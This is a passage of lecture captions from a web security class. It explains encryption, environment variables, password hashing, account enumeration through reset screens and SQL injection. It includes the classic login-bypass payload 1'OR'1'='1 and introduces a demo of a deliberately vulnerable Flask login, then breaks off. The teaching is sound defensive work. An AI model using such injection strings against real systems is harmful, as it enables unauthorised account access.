information, of making sure--

405
00:17:54,490 --> 00:17:56,740
so that we can encrypt our
information so it's not

406
00:17:56,740 --> 00:17:59,440
the plain text of the
request or the response

407
00:17:59,440 --> 00:18:02,560
that's getting sent over the
internet, but rather some ciphertext,

408
00:18:02,560 --> 00:18:06,489
some encrypted version of that plain
text, such that someone in the middle

409
00:18:06,489 --> 00:18:07,780
can't just immediately read it.

410
00:18:07,780 --> 00:18:10,360
And there are all sorts of
different cryptography algorithms.

411
00:18:10,360 --> 00:18:12,880
And we'll talk high level about
a couple of the ideas that

412
00:18:12,880 --> 00:18:14,650
go behind cryptography.

413
00:18:14,650 --> 00:18:17,590
And so one form of cryptography
you might hear about

414
00:18:17,590 --> 00:18:20,920
is secret key cryptography,
where the idea there

415
00:18:20,920 --> 00:18:24,010
is that we have a secret key
that only I know and only

416
00:18:24,010 --> 00:18:27,220
the person at the other computer that
I want to communicate with knows.

417
00:18:27,220 --> 00:18:30,790
And that key can be used with
my cryptographic algorithm

418
00:18:30,790 --> 00:18:32,500
to encrypt my plain text.

419
00:18:32,500 --> 00:18:37,030
I take my plain text and use my secret
key to encrypt it into ciphertext.

420
00:18:37,030 --> 00:18:39,910
Or likewise, I can use the
key to decrypt information.

421
00:18:39,910 --> 00:18:43,000
If I have ciphertext, something
that's already been encrypted,

422
00:18:43,000 --> 00:18:45,790
I can use that key along
with the ciphertext

423
00:18:45,790 --> 00:18:47,800
in order to generate plain text.

424
00:18:47,800 --> 00:18:50,860
And so you might imagine a diagram
where I have one computer over here

425
00:18:50,860 --> 00:18:53,260
and I'm trying to communicate
with a computer down there.

426
00:18:53,260 --> 00:18:57,750
I have this secret key, this ability
to encrypt and decrypt information,

427
00:18:57,750 --> 00:19:00,250
and I also have the plain text
of what it is that I actually

428
00:19:00,250 --> 00:19:05,470
want to encrypt, the message that I want
to send from one place to the other.

429
00:19:05,470 --> 00:19:07,060
And so what might reasonably happen?

430
00:19:07,060 --> 00:19:10,030
What I do in secret key
cryptography is first

431
00:19:10,030 --> 00:19:13,330
use the key to encrypt
the plain text, generating

432
00:19:13,330 --> 00:19:16,090
some ciphertext, some encrypted
version of the plain text

433
00:19:16,090 --> 00:19:19,300
that someone without the key
wouldn't be able to understand.

434
00:19:19,300 --> 00:19:22,880
So then I would need to transfer
the ciphertext to this computer.

435
00:19:22,880 --> 00:19:26,110
And if this computer has both the
ciphertext and a copy of that same

436
00:19:26,110 --> 00:19:30,490
secret key, then they can use that key
in order to decrypt that ciphertext

437
00:19:30,490 --> 00:19:34,000
and regenerate the plain text-- find
out what it is that I actually intended

438
00:19:34,000 --> 00:19:34,810
to happen--

439
00:19:34,810 --> 00:19:39,220
such that now, the plain text was
never transferred from one computer

440
00:19:39,220 --> 00:19:40,060
to the other.

441
00:19:40,060 --> 00:19:42,850
I was only ever
transferring the ciphertext

442
00:19:42,850 --> 00:19:45,520
from one computer to the other.

443
00:19:45,520 --> 00:19:48,381
Does anyone see a problem
with what we just did there?

444
00:19:48,381 --> 00:19:50,380
It seems like no plain
text is ever transferred.

445
00:19:50,380 --> 00:19:50,910
What could go wrong?

446
00:19:50,910 --> 00:19:51,342
Yeah?

447
00:19:51,342 --> 00:19:52,640
AUDIENCE: How do you send the key?

448
00:19:52,640 --> 00:19:52,930
BRIAN YU: Great.

449
00:19:52,930 --> 00:19:54,070
How do you send the key?

450
00:19:54,070 --> 00:19:58,270
That somehow, I need to have
this key and the person over here

451
00:19:58,270 --> 00:20:00,160
also needs to have that key.

452
00:20:00,160 --> 00:20:03,252
And if I'm just sending the key
over the internet from one computer

453
00:20:03,252 --> 00:20:04,960
to the other, which
I would theoretically

454
00:20:04,960 --> 00:20:06,880
need to do because otherwise
I have no way of communicating

455
00:20:06,880 --> 00:20:10,160
with the other computer, then we've
just created the same problem again.

456
00:20:10,160 --> 00:20:13,240
That any of these routers,
these intermediary pieces,

457
00:20:13,240 --> 00:20:16,780
over the course of this communication
from computer A to computer B,

458
00:20:16,780 --> 00:20:20,176
could just intercept the key
and intercept the ciphertext.

459
00:20:20,176 --> 00:20:22,300
And now they have all the
pieces they need in order

460
00:20:22,300 --> 00:20:24,620
to regenerate the plain text.

461
00:20:24,620 --> 00:20:28,300
So this secret key
cryptography works if and only

462
00:20:28,300 --> 00:20:31,630
if only I and only the other
person have access to the key.

463
00:20:31,630 --> 00:20:35,440
And it doesn't work so well
if this key is something

464
00:20:35,440 --> 00:20:39,160
that needs to be transferred
plainly over the network in order

465
00:20:39,160 --> 00:20:42,740
to get to the other person, because then
anyone could just intercept that key.

466
00:20:42,740 --> 00:20:44,269
And so how do we solve that problem?

467
00:20:44,269 --> 00:20:46,060
Well, one solution
people have come up with

468
00:20:46,060 --> 00:20:48,410
is this idea of public key cryptography.

469
00:20:48,410 --> 00:20:50,830
And this is very common,
and it's what HTTPS

470
00:20:50,830 --> 00:20:54,850
uses in order to securely transfer
information over the internet.

471
00:20:54,850 --> 00:20:59,170
And the idea there is instead of
having just one key, we have two keys.

472
00:20:59,170 --> 00:21:01,690
We have a public key and a private key.

473
00:21:01,690 --> 00:21:03,940
And these are related in a
particularly important way,

474
00:21:03,940 --> 00:21:06,740
and the details have to do
with a lot of mathematics.

475
00:21:06,740 --> 00:21:10,750
But the general idea is that
the public key is something

476
00:21:10,750 --> 00:21:12,920
that you should be able
to share with anyone,

477
00:21:12,920 --> 00:21:16,500
and the public key can only be
used to encrypt information.

478
00:21:16,500 --> 00:21:18,940
It will take plain
text and it'll generate

479
00:21:18,940 --> 00:21:20,752
the ciphertext, the encrypted version.

480
00:21:20,752 --> 00:21:22,460
But it doesn't go in
the other direction.

481
00:21:22,460 --> 00:21:24,880
It can only be used to encrypt data.

482
00:21:24,880 --> 00:21:27,409
And likewise, the
private key is something

483
00:21:27,409 --> 00:21:29,200
that you should only
ever keep to yourself.

484
00:21:29,200 --> 00:21:31,660
You should never share your
private key with anyone else.

485
00:21:31,660 --> 00:21:34,360
And the private key can
be used to decrypt data.

486
00:21:34,360 --> 00:21:36,550
That if I have encrypted
information that

487
00:21:36,550 --> 00:21:40,090
was encrypted using the public
key, I can use the private key

488
00:21:40,090 --> 00:21:42,271
in order to decrypt it.

489
00:21:42,271 --> 00:21:44,020
So what does that model
look like if I now

490
00:21:44,020 --> 00:21:46,720
have two computers that want
to communicate with each other?

491
00:21:46,720 --> 00:21:48,670
I still have this
computer over here that

492
00:21:48,670 --> 00:21:51,680
wants to send this plain
text over to this computer,

493
00:21:51,680 --> 00:21:53,560
but wants to do so securely.

494
00:21:53,560 --> 00:21:55,630
So the first thing that's
going to need to happen

495
00:21:55,630 --> 00:21:58,330
is that this computer,
computer B down here,

496
00:21:58,330 --> 00:22:01,654
gives its public key to
computer A. And that's

497
00:22:01,654 --> 00:22:04,570
OK because the public key is something
that can be shared with anyone.

498
00:22:04,570 --> 00:22:07,150
Anyone's allowed to see it
because the public key can only

499
00:22:07,150 --> 00:22:08,590
be used to encrypt data.

500
00:22:08,590 --> 00:22:11,060
It can't be used to decrypt data.

501
00:22:11,060 --> 00:22:14,920
And so now computer A, having access
to the plain text and the public key,

502
00:22:14,920 --> 00:22:19,010
now has the ability to encrypt the
plain text, generating the ciphertext.

503
00:22:19,010 --> 00:22:22,420
That ciphertext then gets transferred
down to the other computer.

504
00:22:22,420 --> 00:22:26,140
And now computer B has both the
ciphertext, this encrypted information

505
00:22:26,140 --> 00:22:29,350
that nobody along this path
was able to read or see,

506
00:22:29,350 --> 00:22:33,130
and also has access to this private
key that only they had access to.

507
00:22:33,130 --> 00:22:37,210
And that is the only thing that can be
used in order to take the ciphertext

508
00:22:37,210 --> 00:22:40,700
and decrypt it and figure out what
it is that the message actually is.

509
00:22:40,700 --> 00:22:44,940
And now computer B has the ability
to regenerate the plain text from it.

510
00:22:44,940 --> 00:22:48,575
And so now we've been able to come up
with a secure way of allowing computer

511
00:22:48,575 --> 00:22:51,380
A and computer B to
communicate with each other,

512
00:22:51,380 --> 00:22:55,341
just by allowing them to use this
public and private key pairing such

513
00:22:55,341 --> 00:22:57,590
that the public key is used
to encrypt the information

514
00:22:57,590 --> 00:22:59,990
and is shared with everyone,
and the private key is only

515
00:22:59,990 --> 00:23:01,820
used for decrypting the information.

516
00:23:01,820 --> 00:23:03,470
And it doesn't matter if
the intermediaries have

517
00:23:03,470 --> 00:23:05,844
the public key because that
just means other people might

518
00:23:05,844 --> 00:23:09,470
be able to encrypt the
data, but not necessarily be

519
00:23:09,470 --> 00:23:11,992
able to decrypt that information.

520
00:23:11,992 --> 00:23:14,700
Questions about that or any problems
that we see with that model?

521
00:23:14,700 --> 00:23:19,140


522
00:23:19,140 --> 00:23:20,040
OK.

523
00:23:20,040 --> 00:23:23,520
In that case, we'll go
ahead and move on to talking

524
00:23:23,520 --> 00:23:27,501
about our next subject, which is
going to be environment variables.

525
00:23:27,501 --> 00:23:29,250
And so environment
variables are something

526
00:23:29,250 --> 00:23:32,771
we've seen a little bit of in Flask
before, and probably in Django as well.

527
00:23:32,771 --> 00:23:34,770
But we'll talk about it
in the context of trying

528
00:23:34,770 --> 00:23:36,730
to make our applications more secure.

529
00:23:36,730 --> 00:23:38,730
So we talked about,
in the context of Git

530
00:23:38,730 --> 00:23:41,700
earlier, that we rarely,
or probably never,

531
00:23:41,700 --> 00:23:45,027
want to put passwords or other
secure, confidential information

532
00:23:45,027 --> 00:23:46,110
inside of our source code.

533
00:23:46,110 --> 00:23:50,530
Because as soon as we push a password or
an access token to a GitHub repository,

534
00:23:50,530 --> 00:23:52,957
now suddenly anyone who has
had access to that repository

535
00:23:52,957 --> 00:23:54,540
could theoretically be able to see it.

536
00:23:54,540 --> 00:23:57,660
Or if someone gets access to your
GitHub account by some means or another,

537
00:23:57,660 --> 00:24:00,660
they would also be able to see
that password or access token.

538
00:24:00,660 --> 00:24:03,930
Maybe that's going to be an access token
that is the access token for getting

539
00:24:03,930 --> 00:24:05,880
access to your database, for instance.

540
00:24:05,880 --> 00:24:08,170
Or it's your access
token for whatever cloud

541
00:24:08,170 --> 00:24:10,170
provider you're using,
like Amazon Web Services,

542
00:24:10,170 --> 00:24:13,050
in order to deploy your
application to the internet.

543
00:24:13,050 --> 00:24:16,830
So rather than doing something
like this, where if you've used

544
00:24:16,830 --> 00:24:19,350
Flask before and have used
their cookie-based sessions,

545
00:24:19,350 --> 00:24:21,825
you need to set a secret key
inside of your application

546
00:24:21,825 --> 00:24:23,700
where you might have
set a secret key to just

547
00:24:23,700 --> 00:24:28,020
be some random string of characters,
which is totally fine from just running

548
00:24:28,020 --> 00:24:29,040
the application.

549
00:24:29,040 --> 00:24:31,230
This isn't all that
secure because as soon

550
00:24:31,230 --> 00:24:34,140
as you push this file to
the internet, now anyone

551
00:24:34,140 --> 00:24:36,360
who has access to your
repository theoretically

552
00:24:36,360 --> 00:24:38,339
has access to your secret key as well.

553
00:24:38,339 --> 00:24:41,130
And so these are often times where
we would want to use environment

554
00:24:41,130 --> 00:24:44,920
variables, using variables that are
located just inside of the system

555
00:24:44,920 --> 00:24:48,270
on the computer where your program
is running such that we can replace

556
00:24:48,270 --> 00:24:52,690
the key with
os.environ.get("SECRET_KEY").

557
00:24:52,690 --> 00:24:55,650
In other words, get the environment
variable called secret key

558
00:24:55,650 --> 00:24:58,830
and use it as a secret key
so that inside your code, now

559
00:24:58,830 --> 00:24:59,910
it just says this.

560
00:24:59,910 --> 00:25:03,750
So nobody who reads your code knows what
the secret key for your application is,

561
00:25:03,750 --> 00:25:08,070
but only the computer on which this
program is running that, theoretically,

562
00:25:08,070 --> 00:25:11,200
has that secret key set as one
of its environment variables

563
00:25:11,200 --> 00:25:12,540
will then be able to use it.

564
00:25:12,540 --> 00:25:14,560
And so environment
variables in that sense

565
00:25:14,560 --> 00:25:17,460
can be a very valuable
tool when it comes

566
00:25:17,460 --> 00:25:20,460
to trying to make sure that
we're not exposing information

567
00:25:20,460 --> 00:25:25,320
that we didn't want to expose when
we were creating our application.

568
00:25:25,320 --> 00:25:29,580
Questions about environment variables?

569
00:25:29,580 --> 00:25:30,330
All right.

570
00:25:30,330 --> 00:25:31,530
So that was Flask.

571
00:25:31,530 --> 00:25:34,710
And let's go ahead now and
move on to talking about SQL.

572
00:25:34,710 --> 00:25:37,020
So we talked a lot
about databases and how

573
00:25:37,020 --> 00:25:39,150
we might go about designing databases.

574
00:25:39,150 --> 00:25:41,220
And in a couple of our
projects now, we've

575
00:25:41,220 --> 00:25:45,000
had to create a table that is able
to manage a database of users, where

576
00:25:45,000 --> 00:25:47,040
users are able to log in and log out.

577
00:25:47,040 --> 00:25:50,730
And in order to do that, we needed some
sort of database structure in place

578
00:25:50,730 --> 00:25:54,369
such that users were able to be
remembered by our system such

579
00:25:54,369 --> 00:25:56,910
that they could log in such that
they had passwords and such.

580
00:25:56,910 --> 00:25:59,743
And you might imagine that a users
table might have looked something

581
00:25:59,743 --> 00:26:03,510
like this, where each user has
an ID, each user has a user name,

582
00:26:03,510 --> 00:26:06,010
each user has a password.

583
00:26:06,010 --> 00:26:09,855
What are potential design problems
of security vulnerabilities

584
00:26:09,855 --> 00:26:11,480
with a table that's designed like this?

585
00:26:11,480 --> 00:26:14,290


586
00:26:14,290 --> 00:26:15,512
Yep?

587
00:26:15,512 --> 00:26:18,278
AUDIENCE: If someone gets
their hands on the database,

588
00:26:18,278 --> 00:26:19,670
they can see all the passwords.

589
00:26:19,670 --> 00:26:19,970
BRIAN YU: Yeah.

590
00:26:19,970 --> 00:26:22,160
So obviously, we want to
keep our tables secure.

591
00:26:22,160 --> 00:26:24,701
We don't want to let just anyone
have access to our database.

592
00:26:24,701 --> 00:26:27,230
But if by some chance, someone
got access to our database,

593
00:26:27,230 --> 00:26:30,380
either because they managed to
figure out what the password is

594
00:26:30,380 --> 00:26:32,720
or they got access to it
in some other way, now

595
00:26:32,720 --> 00:26:37,370
suddenly they have access to all
of the different passwords that

596
00:26:37,370 --> 00:26:38,904
are inside of this database.

597
00:26:38,904 --> 00:26:40,820
They know what everyone's
password is, and now

598
00:26:40,820 --> 00:26:42,620
that's a major security vulnerability.

599
00:26:42,620 --> 00:26:45,710
Especially if some of these users
might be using these same passwords

600
00:26:45,710 --> 00:26:48,980
not only on one website, but on
many other different websites.

601
00:26:48,980 --> 00:26:52,850
Now their password could be compromised
across a number of different websites

602
00:26:52,850 --> 00:26:53,790
as well.

603
00:26:53,790 --> 00:26:58,017
And so what might be a solution here to
avoiding needing to store the password

604
00:26:58,017 --> 00:26:58,850
inside of the table?

605
00:26:58,850 --> 00:27:00,470
And this might be something
that you've already

606
00:27:00,470 --> 00:27:02,094
done in some of your existing projects.

607
00:27:02,094 --> 00:27:04,940


608
00:27:04,940 --> 00:27:06,405
AUDIENCE: Encrypt the passwords.

609
00:27:06,405 --> 00:27:07,030
BRIAN YU: Yeah.

610
00:27:07,030 --> 00:27:08,230
Encrypt the password.

611
00:27:08,230 --> 00:27:11,350
In other words, don't just store
the plain text of the password,

612
00:27:11,350 --> 00:27:13,310
store some version of the password.

613
00:27:13,310 --> 00:27:15,310
And in particular, we'll
generally store what we

614
00:27:15,310 --> 00:27:17,530
call a hashed version of the password.

615
00:27:17,530 --> 00:27:21,490
Where a hash function is just going to
be some function inside of your code

616
00:27:21,490 --> 00:27:25,240
that takes text like a
password and generates,

617
00:27:25,240 --> 00:27:29,350
deterministically, some long sequence of
characters that's seemingly random that

618
00:27:29,350 --> 00:27:31,750
is associated with that text.

619
00:27:31,750 --> 00:27:35,620
And so every time you put hello
in as the password and hash it,

620
00:27:35,620 --> 00:27:38,050
you'll always deterministically
get the same output.

621
00:27:38,050 --> 00:27:40,550
And so then your users table
might look something like this.

622
00:27:40,550 --> 00:27:43,420
Where you've got all of your
users, but in your password column,

623
00:27:43,420 --> 00:27:46,150
instead of storing the actual
password in plain text,

624
00:27:46,150 --> 00:27:49,090
you're storing some hashed
version of that password.

625
00:27:49,090 --> 00:27:52,810
Such that hello generates
this text as the password

626
00:27:52,810 --> 00:27:54,910
instead of just storing hello.

627
00:27:54,910 --> 00:27:58,900
So now if someone gets
access to this database,

628
00:27:58,900 --> 00:28:01,650
they're still not going to be able
to log into Anushree's account,

629
00:28:01,650 --> 00:28:04,108
for instance, if they go to
the website because they're not

630
00:28:04,108 --> 00:28:08,950
going to know what password corresponded
with this long sequence of characters.

631
00:28:08,950 --> 00:28:13,000
And generally, hash functions are
designed to be one-way functions.

632
00:28:13,000 --> 00:28:16,870
That you can go from the plain text,
the password, to this hashed version.

633
00:28:16,870 --> 00:28:19,540
But it's very, very computationally
difficult to go backwards,

634
00:28:19,540 --> 00:28:22,450
to go from this hashed version
to what the password originally

635
00:28:22,450 --> 00:28:24,880
was in order to generate this.

636
00:28:24,880 --> 00:28:29,300
And so what are the security
implications of this model?

637
00:28:29,300 --> 00:28:30,880
How do we now log in a user, now?

638
00:28:30,880 --> 00:28:31,509
In this model.

639
00:28:31,509 --> 00:28:33,550
If someone were to log
into a website, what logic

640
00:28:33,550 --> 00:28:35,508
would need to happen if
we're no longer storing

641
00:28:35,508 --> 00:28:37,732
passwords but storing hashed passwords?

642
00:28:37,732 --> 00:28:38,232
Yeah?

643
00:28:38,232 --> 00:28:38,728
AUDIENCE: They could
take the password they

644
00:28:38,728 --> 00:28:40,519
enter, you run through
your hash algorithm,

645
00:28:40,519 --> 00:28:42,436
and you see if it matches
what's in your file.

646
00:28:42,436 --> 00:28:43,269
BRIAN YU: Wonderful.

647
00:28:43,269 --> 00:28:45,220
User logs in with their
user and password.

648
00:28:45,220 --> 00:28:47,710
You take that password and
you hash it, and you check

649
00:28:47,710 --> 00:28:49,520
to make sure that the hash matches up.

650
00:28:49,520 --> 00:28:51,478
And because our hash
function is deterministic,

651
00:28:51,478 --> 00:28:54,790
the same input will output the
same output every, single time.

652
00:28:54,790 --> 00:28:57,250
If they did input the correct
password, then the hashes

653
00:28:57,250 --> 00:28:59,920
should theoretically line up.

654
00:28:59,920 --> 00:29:02,020
Have you ever used a
website before where,

655
00:29:02,020 --> 00:29:04,562
when you forget a
password, your password,

656
00:29:04,562 --> 00:29:06,520
and you might want the
website to just tell you

657
00:29:06,520 --> 00:29:08,965
what your password is, but
the website says, sorry,

658
00:29:08,965 --> 00:29:12,940
we can't tell you what your password is,
but we can let you reset your password.

659
00:29:12,940 --> 00:29:14,900
With this in mind, why
might that be the case?

660
00:29:14,900 --> 00:29:18,472
Why can a website sometimes
not tell you what your password

661
00:29:18,472 --> 00:29:19,930
is but still allow you to reset it?

662
00:29:19,930 --> 00:29:23,425
Or still be able to log you
in if you knew your password?

663
00:29:23,425 --> 00:29:25,800
AUDIENCE: Because they're not
storing it in text anymore.

664
00:29:25,800 --> 00:29:27,339
So we don't know--

665
00:29:27,339 --> 00:29:28,380
BRIAN YU: Great, exactly.

666
00:29:28,380 --> 00:29:30,671
It's because of this idea of
the one-way hash function.

667
00:29:30,671 --> 00:29:33,770
That if you take the password, you
can generate this hashed version.

668
00:29:33,770 --> 00:29:35,894
But it's very difficult to
go the other way around.

669
00:29:35,894 --> 00:29:39,851
Such that, if this is what I have access
to in my database, I can look at this,

670
00:29:39,851 --> 00:29:42,350
and I don't actually know what
Anushree's or Elle's password

671
00:29:42,350 --> 00:29:43,304
originally was.

672
00:29:43,304 --> 00:29:46,470
But if you give me their password, then
I can hash it and compare it for you

673
00:29:46,470 --> 00:29:49,350
and maybe be able to tell
you that as a result.

674
00:29:49,350 --> 00:29:51,650
But I could reset it if I
wanted to just by replacing

675
00:29:51,650 --> 00:29:53,517
this field with some new hashed value.

676
00:29:53,517 --> 00:29:55,850
That would be something that
I could do, but I might not

677
00:29:55,850 --> 00:29:58,144
be able to actually tell
you what that password is.

678
00:29:58,144 --> 00:30:00,560
Of course, if these passwords
are common, like these are--

679
00:30:00,560 --> 00:30:03,800
if they're just passwords
hello or password or 12345--

680
00:30:03,800 --> 00:30:06,710
then how might I still be able
to figure out a user's password

681
00:30:06,710 --> 00:30:10,870
even if the database looks like this?

682
00:30:10,870 --> 00:30:11,574
Yeah?

683
00:30:11,574 --> 00:30:13,912
AUDIENCE: You hash it and
compare the hashes or if you

684
00:30:13,912 --> 00:30:15,370
can look for common hashes and see.

685
00:30:15,370 --> 00:30:16,310
BRIAN YU: Exactly.

686
00:30:16,310 --> 00:30:20,360
If you know what the hash function
is, then someone trying to--

687
00:30:20,360 --> 00:30:22,640
a malicious user trying
to exploit the system

688
00:30:22,640 --> 00:30:26,180
might be able to just try a whole
bunch of different common passwords,

689
00:30:26,180 --> 00:30:27,950
figure out what their
hashed versions are,

690
00:30:27,950 --> 00:30:31,146
and then compare it to the versions
that are here in order to figure out

691
00:30:31,146 --> 00:30:32,270
what the password might be.

692
00:30:32,270 --> 00:30:34,490
So even this is not a 100% foolproof.

693
00:30:34,490 --> 00:30:36,710
Someone who is trying a
bunch of common passwords

694
00:30:36,710 --> 00:30:39,117
might still be able to
figure out what it is

695
00:30:39,117 --> 00:30:40,700
that's going on inside of this system.

696
00:30:40,700 --> 00:30:42,950
And so that's certainly
one vulnerability

697
00:30:42,950 --> 00:30:46,360
that could come up when we
think about database design.

698
00:30:46,360 --> 00:30:48,110
But another vulnerability,
and this is one

699
00:30:48,110 --> 00:30:50,235
we talked about a little
bit a couple of weeks ago,

700
00:30:50,235 --> 00:30:52,610
but we'll dive into in a
little more depth now--

701
00:30:52,610 --> 00:30:54,797
well, actually, first,
before we get there, sorry.

702
00:30:54,797 --> 00:30:56,630
So this was that Forgot
Your Password screen

703
00:30:56,630 --> 00:30:58,838
that we were talking a little
bit about before, where

704
00:30:58,838 --> 00:31:02,529
oftentimes what might happen is you'll
type in an email address, for instance,

705
00:31:02,529 --> 00:31:04,070
and you'll click Reset Your Password.

706
00:31:04,070 --> 00:31:05,986
And that will send you
an email that gives you

707
00:31:05,986 --> 00:31:08,610
the ability to reset your password.

708
00:31:08,610 --> 00:31:12,110
So another possible way the
databases could be insecure,

709
00:31:12,110 --> 00:31:16,610
we might have vulnerabilities inside
of the security of our database,

710
00:31:16,610 --> 00:31:20,330
is thinking about what information
might be leaked by our database.

711
00:31:20,330 --> 00:31:22,970
What information can get out
when we don't want it to get out?

712
00:31:22,970 --> 00:31:26,240
And can anyone see a
potential vulnerability here,

713
00:31:26,240 --> 00:31:27,740
in terms of information leakage?

714
00:31:27,740 --> 00:31:30,740
Information that might be exposed
that we might otherwise not want

715
00:31:30,740 --> 00:31:34,550
exposed, just from a user interface
like this that people can use?

716
00:31:34,550 --> 00:31:37,938


717
00:31:37,938 --> 00:31:43,784
AUDIENCE: Your email address might be
exposed as it's going over the web.

718
00:31:43,784 --> 00:31:44,450
BRIAN YU: Great.

719
00:31:44,450 --> 00:31:46,380
So your email address
is potentially exposed

720
00:31:46,380 --> 00:31:48,070
as it's traveling from
one point to another.

721
00:31:48,070 --> 00:31:50,570
Although, with HTTPS and trying
to encrypt that information,

722
00:31:50,570 --> 00:31:52,730
usually we can help to
defend against that.

723
00:31:52,730 --> 00:31:55,370
But certainly the idea of
typing in an email address

724
00:31:55,370 --> 00:31:59,420
and clicking on reset password leads
to potential information leakage

725
00:31:59,420 --> 00:32:00,830
in other potential ways.

726
00:32:00,830 --> 00:32:04,400
Whereby if I type in an
email address of my account

727
00:32:04,400 --> 00:32:06,250
that I've perhaps
forgotten my password to,

728
00:32:06,250 --> 00:32:09,208
or a friend's account that I think
they've forgotten their password to,

729
00:32:09,208 --> 00:32:11,819
potentially, and I click
Reset Password, then

730
00:32:11,819 --> 00:32:14,360
I might see a notification that
very recently might just say,

731
00:32:14,360 --> 00:32:17,330
password reset email sent.

732
00:32:17,330 --> 00:32:21,320
What if I typed in the
email address of someone who

733
00:32:21,320 --> 00:32:23,302
didn't have an account on the website?

734
00:32:23,302 --> 00:32:25,010
What might you expect
this website to do?

735
00:32:25,010 --> 00:32:29,020


736
00:32:29,020 --> 00:32:29,520
Yeah?

737
00:32:29,520 --> 00:32:30,430
AUDIENCE: Give you an error message.

738
00:32:30,430 --> 00:32:31,610
BRIAN YU: Should give you
an error of some sort.

739
00:32:31,610 --> 00:32:34,760
Something like, error, there is no
such user with that email address.

740
00:32:34,760 --> 00:32:38,000
And now that we've seen those two
screens, you type in an email address

741
00:32:38,000 --> 00:32:41,390
and sometimes you get password reset
email sent and sometimes you get error,

742
00:32:41,390 --> 00:32:43,460
there is no user with
that email address.

743
00:32:43,460 --> 00:32:46,210
Where is the potential
information leakage here?

744
00:32:46,210 --> 00:32:46,710
Yeah?

745
00:32:46,710 --> 00:32:48,668
AUDIENCE: It could figure
out who the users are

746
00:32:48,668 --> 00:32:49,964
by trying out different emails.

747
00:32:49,964 --> 00:32:50,630
BRIAN YU: Great.

748
00:32:50,630 --> 00:32:53,000
Now, by using this screen, even if
I don't know people's passwords,

749
00:32:53,000 --> 00:32:55,940
I can figure out who has an account with
this website and who doesn't, right?

750
00:32:55,940 --> 00:32:58,731
If it's a bank, for instance, and
I type in someone's email address

751
00:32:58,731 --> 00:33:01,280
and I get this screen,
password reset email sent,

752
00:33:01,280 --> 00:33:04,560
now I know that this particular
user has an account with this bank.

753
00:33:04,560 --> 00:33:07,717
And that might not be something that
your application wants to expose.

754
00:33:07,717 --> 00:33:09,800
And so as you go about
designing web applications,

755
00:33:09,800 --> 00:33:12,000
you always want to be
bearing these things in mind.

756
00:33:12,000 --> 00:33:15,800
Thinking about what information
from the database is being exposed

757
00:33:15,800 --> 00:33:18,560
and how might information that
I don't want to be exposed,

758
00:33:18,560 --> 00:33:20,720
might be exposed to
users that I don't want

759
00:33:20,720 --> 00:33:22,190
to have access to that information.

760
00:33:22,190 --> 00:33:24,200
And certainly this is
one potential example

761
00:33:24,200 --> 00:33:26,502
that maybe you don't really
care if your users are

762
00:33:26,502 --> 00:33:29,210
able to know if other people have
accounts on the website or not.

763
00:33:29,210 --> 00:33:33,320
But maybe in a place where it's
more sensitive or more secure about

764
00:33:33,320 --> 00:33:35,960
whether or not a user has an
account on the website or not,

765
00:33:35,960 --> 00:33:37,280
this might be something
you do care about.

766
00:33:37,280 --> 00:33:39,071
And you'd want to think
carefully about how

767
00:33:39,071 --> 00:33:41,840
you design the user interface,
about how users are interacting

768
00:33:41,840 --> 00:33:43,673
with the database, and
whether or not you're

769
00:33:43,673 --> 00:33:46,130
ever exposing information
that you don't want

770
00:33:46,130 --> 00:33:49,524
to ultimately be exposed to the user.

771
00:33:49,524 --> 00:33:50,690
Questions about any of that?

772
00:33:50,690 --> 00:33:53,498


773
00:33:53,498 --> 00:33:54,910
OK.

774
00:33:54,910 --> 00:33:57,470
So now moving onto the topic
about SQL and vulnerabilities

775
00:33:57,470 --> 00:34:00,850
that we did talk about a couple weeks
ago, and namely that was SQL injection.

776
00:34:00,850 --> 00:34:04,640
And does anyone recall what SQL
injection is and why it's a problem?

777
00:34:04,640 --> 00:34:05,420
Yeah?

778
00:34:05,420 --> 00:34:09,454
AUDIENCE: So in a SQL web
class, we added or condition.

779
00:34:09,454 --> 00:34:10,120
BRIAN YU: Great.

780
00:34:10,120 --> 00:34:12,969
We were able to add an or
condition, or more generally,

781
00:34:12,969 --> 00:34:17,210
just some sort of SQL code
into input for instance,

782
00:34:17,210 --> 00:34:21,280
and get our own SQL code to
run on someone else's server.

783
00:34:21,280 --> 00:34:24,760
So we were able to effectively do
whatever we wanted with the database

784
00:34:24,760 --> 00:34:28,090
because we could run arbitrary
SQL queries on that database.

785
00:34:28,090 --> 00:34:30,760
And so the example we
looked at, which we'll

786
00:34:30,760 --> 00:34:33,100
look at an actual Flask
example of that today,

787
00:34:33,100 --> 00:34:36,389
is a user name and
password field where we

788
00:34:36,389 --> 00:34:38,139
might use that information
on the back end

789
00:34:38,139 --> 00:34:40,389
to run a SQL query that
looks something like this.

790
00:34:40,389 --> 00:34:43,510
Select star from users
where user name equals

791
00:34:43,510 --> 00:34:47,590
whatever the user name was and password
equals whatever the password was.

792
00:34:47,590 --> 00:34:50,984
And we imagine that if a user logs in,
like Alice with the password hello,

793
00:34:50,984 --> 00:34:53,650
then we'd end up running a query
that looks something like this,

794
00:34:53,650 --> 00:34:57,320
substituting in Alice as the
username, hello as the password,

795
00:34:57,320 --> 00:35:00,310
and now we're selecting from all the
users where Alice is the username

796
00:35:00,310 --> 00:35:01,670
and hello is the password.

797
00:35:01,670 --> 00:35:05,770
And if there is a matching one, then
this will return a row, and otherwise,

798
00:35:05,770 --> 00:35:06,312
it won't.

799
00:35:06,312 --> 00:35:08,020
And of course, in this
case, the password

800
00:35:08,020 --> 00:35:10,380
is not hashed, though
in a more secure system,

801
00:35:10,380 --> 00:35:14,710
we might want to hash that password
first and then run this query.

802
00:35:14,710 --> 00:35:16,490
But what might go wrong here?

803
00:35:16,490 --> 00:35:20,350
So we talked about what would happen if
someone types in Alice as the user name

804
00:35:20,350 --> 00:35:27,760
and something like this as the
password, 1'OR'1'='1, which seems sort

805
00:35:27,760 --> 00:35:31,510
of complicated, but the result of that
was that when we plugged everything

806
00:35:31,510 --> 00:35:37,000
in, now we're selecting from users where
the user name is Alice and the password

807
00:35:37,000 --> 00:35:38,650
is 1-- which it isn't--

808
00:35:38,650 --> 00:35:41,200
or the string 1 equals the string 1.

809
00:35:41,200 --> 00:35:44,720
Well, this is, of course, true, and
now we're going to get some row back.

810
00:35:44,720 --> 00:35:46,720
And so how might that
actually work in practice?

811
00:35:46,720 --> 00:35:50,740
Let's take a look at a web application
that implements this very idea of just

812
00:35:50,740 --> 00:35:53,590
a very simple login system
where an exploit like this

813
00:35:53,590 --> 00:35:57,500
can help anyone get access
to any other user account.

814
00:35:57,500 --> 00:36:03,790
So let's take a look at
injection and application.py.

815
00:36:03,790 --> 00:36:09,430
So this is just a Flask
application, and our default route,

816
